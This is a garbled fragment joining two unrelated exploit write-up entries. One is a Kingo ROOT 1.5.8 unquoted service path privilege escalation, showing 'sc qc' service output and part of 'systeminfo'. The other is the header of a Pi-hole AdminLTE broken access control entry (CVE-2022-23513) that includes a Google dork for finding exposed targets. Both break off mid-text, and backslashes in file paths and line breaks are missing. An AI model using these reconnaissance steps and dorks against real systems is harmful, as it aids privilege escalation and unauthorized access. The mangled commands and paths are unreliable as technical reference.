#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path#Date: 8/22/2023#Exploit Author: Anish Feroz (ZEROXINN)#Vendor Homepage: https://www.kingoapp.com/#Software Link: https://www.kingoapp.com/android-root/download.htm#Version: 1.5.8.3353#Tested on: Windows 10 Pro -Discovering Unquoted Path C:UsersAnish>sc qc KingoSoftService[SC] QueryServiceConfig SUCCESSSERVICE NAME: KingoSoftServiceTYPE : 110 WIN32 OWN PROCESS (interactive)START TYPE : 2 AUTO STARTERROR CONTROL : 1 NORMALBINARY PATH NAME : C:UsersUsmanAppDataLocalKingosoftKingo Rootupdate 27205binKingoSoftService.exeLOAD ORDER GROUP :TAG : 0DISPLAY NAME : KingoSoftServiceDEPENDENCIES :SERVICE START NAME : LocalSystemC:UsersAnish>systeminfoHost Name: DESKTOP-UT7E7CFOS Name: Microsoft
# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit googlehack.216554)# Date: 21.12.2022# Exploit Author: kv1to# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17# Tested on: Raspbian / Debian# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497# CVE : CVE-2022-23513In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked